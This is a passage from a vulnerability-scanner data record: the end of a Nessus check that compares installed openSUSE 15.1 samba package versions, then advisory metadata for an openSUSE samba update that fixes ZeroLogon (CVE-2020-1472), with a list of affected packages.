flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-pidl-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:58", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes = CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1526)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", 